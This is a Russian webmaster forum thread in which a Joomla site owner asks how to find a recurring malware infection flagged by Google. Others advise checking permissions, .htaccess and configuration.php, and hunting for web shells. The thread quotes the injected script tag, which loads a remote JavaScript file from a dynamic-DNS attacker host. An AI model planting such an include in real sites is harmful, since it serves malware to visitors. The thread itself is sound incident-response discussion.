- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Периодически в панели гугл вебмастер приходят сообщения о вирусе на сайте, в коде ничего нет, после подачи на пересмотр вирус пропадает, но появляется опять через пару дней.
Сайт - джумла 2.5.14, все модули обновленные, права на папки 755, файлы - 644, конфик - 444, пароли от фтп не храню в клиенте, антивирус кис2013 лицензия, хостинг - выделенный сервер (http://www.hetzner.de).
Возможный внедренный код:
<script type="text/javascript" src="//rdomn1381941004.noip.m
e/jquery.js?1381941106">
На других аккаунтах на хостинге тоже периодические появляются записи о вирусах на сайтах, движки сайтов разные, вордпресс, друпал, джумла.
Что делать с сайтом, куда копать ?
покажите сайт для начала/примера
http://ladylambre.vn.ua/
Регистрация запрещена на Джумла?
Отключи curl,
права -запрет на запись 555/444, ну если нужно откроешь для необходимых типа /cache , и понаблюдай.
Рега запрещена, curl отключить - модули перестануть работать, права нормальные же, зачем ставить 555
Периодически в панели гугл вебмастер приходят сообщения о вирусе на сайте, в коде ничего нет, после подачи на пересмотр вирус пропадает, но появляется опять через пару дней.
ТС,. вирус может показываться 1 раз в сутки, потому возможно робот гугла то видит, то нет сам вирус, вам необходимо полностью проверить рабочий код сайта.
curl отключить - модули перестануть работать, права нормальные же, зачем ставить 555
А зачем программе,запускающей пхп, права на запись во все файлы ?
а 555, чтобы проверить - может хостинг взломан, и запись в файл от root.
Обновление без curl не будет работать. Ну решить Вам.
А зачем программе,запускающей пхп, права на запись во все файлы ?
а 555, чтобы проверить - может хостинг взломан, и запись в файл от root.
Обновление без curl не будет работать. Ну решить Вам.
Хм, попробую.
ТС,. вирус может показываться 1 раз в сутки, потому возможно робот гугла то видит, то нет сам вирус, вам необходимо полностью проверить рабочий код сайта.
Легко сказать у меня на одном сервере было 9 сайтов и 7 из них на Джумле правда разных версий, в один прекрасный день на один из новостников пошел не плохой траф с поисковиков, через некоторое время на нем завелись "глисты" дня через 4 яндекс начал матерится на все сайты которые были на джумле, обновление движка не помогало, как только переехала к другому хостеру и в ручную за месяц перелопатила код, все наладилось, сейчас слава богу все нормально, но месяц бессонных ночей :(
Вчера поставил права 777 на папку темп, логс и vmfiles для виртуамарта. Сегодня утром перед закрывающимся head строчка с вирусом, каспер написал "Обнаружено: HEUR:Trojan.Script.Iframer 20.10.2013 10:54:04 http://rdomn1382255103.hopto.me/jquery.js?1382255205// ". Очистил устаревший кеш, вирус пропал.
Где его искать до сих пор непонятно.
100% на сайте есть шелл
1) Проверьте все файлы .htaccess
По большому счету он на сайте должен быть один в корне. (содержание проверьте)
2) Проверьте файл configuration.php - в нем может быть прописан код шелла
3) Проверьте наличие посторонних файлов, в первую очередь в корне, в паgках tmp, cache, images, media и всех вложенных
4) проверьте папки плагинов редакторов, часто шелл маскируют под php файл с названием редактора где-нибудь в глубине папок.
Если есть возможность - проще всего скачать сайт на локальный комп и прогнать по нему антивирус.
Каспер не люблю, но бесплатная авира находит шеллы на раз-два.